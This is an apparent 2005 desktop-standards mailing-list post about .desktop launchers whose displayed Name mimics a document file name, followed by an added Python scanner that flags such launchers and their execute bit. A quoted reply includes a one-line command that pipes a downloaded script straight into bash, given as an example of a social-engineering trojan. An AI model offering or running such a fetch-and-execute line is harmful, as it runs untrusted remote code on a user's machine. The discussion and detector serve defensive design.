"Name" key value in desk. entry spec collides with file names, could misguide users?

Jeffrey Vaughan vaughan2 at seas.upenn.edu
Sun Mar 20 21:20:30 EET 2005


Diego Calleja wrote:
> On Sun, 20 Mar 2005 17:04:01 +0000,
> Mike Hearn <mike at navi.cx> wrote:
> 
>>It is not, you just have to check the right boxes in the properties
>>window. Anybody can learn that. I don't agree that this would have any
>>benefit at all, not even psychological - fundamentally writing trojan
>>horses is not difficult and if you can convince somebody to click on an
>>icon you can convince them to copy/paste some meaningless command into
>>the "Run" dialog like:
>>
>>  wget http://foo.org/bar.sh -q -O /dev/stdout | bash -
>>
>>which achieves the same effect.
> 
> 
> Downloading a file is very different from running a command. Many people won't fall so
> easily on that one (although some - very few - people fell on the "write format C: trick"). Why,
> I don't really know. It probably has something to do with double clicking being a normal
> and trusted operation (the basis of their interaction with computers) and pasting
> weird commands being something unusual and obscure.
> 

I often use the following work pattern:
1) Download 15ish academic papers with file names like: popl2003acm.pdf 
or df3324r.pdf.
2) For each file in my firefox download directory that looks like a pdf 
in the gui, double click on the paper.
3) Rename or delete the paper as appropriate.

Is there any way to do this safely without either 1) requiring +x set on 
.desktop files, 2) using the command line (real pita to switch between 
the mouse for scrolling/zooming & the keyboard for opening pdfs), 3) 
waiting n years for selinux or other not-ready-yet technology?

If these are the only options I think we can dismiss 2 & 3.  Let's set 
that execute bit.

--Jeff
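
The collision this thread discusses, as an added example that is not part of the original message or of any xdg project code: a check over a download directory that reports `.desktop` launchers whose `Name` key reads like a document file name, and whether the execute bit proposed above is set on them. The extension list, the function names and the sample files are assumptions constructed for illustration.

```python
import configparser
import stat
import tempfile
from pathlib import Path

# Assumption: extensions a user would expect to open in a viewer, not run.
DOC_EXTS = (".pdf", ".ps", ".doc", ".txt", ".jpg", ".png")

def read_entry(path):
    """Return (Name, Exec) from the [Desktop Entry] group, or None if unparsable."""
    cp = configparser.RawConfigParser(strict=False, delimiters=("=",))
    cp.optionxform = str  # desktop entry keys are case-sensitive
    try:
        cp.read(path, encoding="utf-8")
        entry = cp["Desktop Entry"]
    except (configparser.Error, KeyError, UnicodeDecodeError):
        return None
    return entry.get("Name", ""), entry.get("Exec", "")

def scan(directory):
    """List launchers whose displayed Name looks like a document file name."""
    findings = []
    for path in sorted(Path(directory).rglob("*.desktop")):
        entry = read_entry(path)
        if entry is None:
            continue
        name, exec_line = entry
        if exec_line and name.lower().endswith(DOC_EXTS):
            has_x = bool(path.stat().st_mode & stat.S_IXUSR)
            findings.append((path.name, name, exec_line, has_x))
    return findings

def demo(mark_executable=False):
    """Scan a constructed download directory (all file contents are made up)."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "df3324r.pdf").write_bytes(b"%PDF-1.4\n")  # a real document
        launcher = root / "paper.desktop"
        launcher.write_text("[Desktop Entry]\nType=Application\n"
                            "Name=popl2003acm.pdf\n"
                            "Exec=sh -c 'echo constructed-placeholder'\n")
        (root / "editor.desktop").write_text(
            "[Desktop Entry]\nType=Application\nName=Text Editor\nExec=gedit %f\n")
        launcher.chmod(0o755 if mark_executable else 0o644)
        return scan(root)

if __name__ == "__main__":
    for fname, shown, cmd, has_x in demo():
        print(f"{fname}: shown as {shown!r}, runs {cmd!r}, +x={has_x}")
```
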


